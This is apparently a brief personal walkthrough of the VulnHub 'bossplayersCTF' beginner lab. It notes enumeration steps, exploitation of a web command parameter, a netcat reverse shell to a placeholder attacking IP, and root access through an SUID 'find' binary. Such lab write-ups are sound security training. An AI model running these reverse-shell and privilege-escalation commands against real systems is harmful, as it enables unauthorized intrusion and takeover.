drsh0's llog

URI: https://www.vulnhub.com/entry/bossplayersctf-1,375/ Difficulty: Easy

Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF's. It should take around 30 minutes to root.

enum

• nmap
• ssh + http; not much else to be seen here
• webpage enumerate: robots.txt, index html source
• find directory via index source (html comment)

exploit

• it appears that the original developer wanted to ping via a web service on the server
• try common terms used for this e.g ?command= or ?exec=
• ?cmd=id works; also looks like we have nc (which nc)
• listener: rlwrap ncat -nlvp $PORT
• reverse shell: nc -e /bin/sh $ATTACKING-IP $PORT
• we're in with user www-data
• grab user flag

privesc

• spawn a tty (we have python): python -c 'import pty; pty.spawn("/bin/sh")'
• look for SUID binaries: find / -user root -perm -4000 -print 2>/dev/null
• notable binaries: grep and find
• both have entries on gtfobins
• use find to spawn a root shell:

find . -exec /bin/sh -p \; -quit

• grab root flag

#vulnhub #php #suid